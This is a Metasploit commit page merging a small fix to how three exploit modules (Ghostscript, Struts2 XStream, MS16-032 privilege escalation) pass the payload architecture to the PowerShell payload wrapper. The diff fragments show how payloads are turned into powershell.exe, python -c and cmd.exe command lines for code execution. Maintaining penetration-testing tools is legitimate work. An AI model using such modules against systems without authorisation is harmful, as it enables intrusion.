Land #12072, cmd_psh_payload arch string fixes

rapid7 · Jul 10, 2019 · cd3ffb9 · cd3ffb9
2 parents c5032df + e6300bf
commit cd3ffb9
Show file tree

Hide file tree

Showing 3 changed files with 16 additions and 5 deletions.
diff --git a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
@@ -88,7 +88,11 @@ def exploit
     when :unix_memory
       sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
     when :psh_memory
-      psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
+      psh = cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      )
 
       # XXX: Payload space applies to the payload, not the PSH command
       if psh.length > targets[0].payload_space

diff --git a/modules/exploits/multi/http/struts2_rest_xstream.rb b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -98,9 +98,16 @@ def execute_command(cmd, opts = {})
       when :py_memory
         %W{python -c #{cmd}}
       when :psh_memory
-        opts = {remove_comspec: true, encode_final_payload: true}
-        payload ? cmd_psh_payload(cmd, payload.arch, opts).split :
-                  %W{powershell.exe -c #{cmd}}
+        if payload
+          cmd_psh_payload(
+            cmd,
+            payload.arch.first,
+            remove_comspec:       true,
+            encode_final_payload: true
+          )
+        else
+          %W{powershell.exe -c #{cmd}}
+        end
       when :win_memory, :win_dropper
         %W{cmd.exe /c #{cmd}}
       end

diff --git a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -104,7 +104,7 @@ def exploit
     end
 
     # payload formatted to fit dropped text file
-    payl = cmd_psh_payload(payload.encoded,payload.arch,{
+    payl = cmd_psh_payload(payload.encoded,payload.arch.first,{
       encode_final_payload: false,
       remove_comspec: true,
       method: 'old'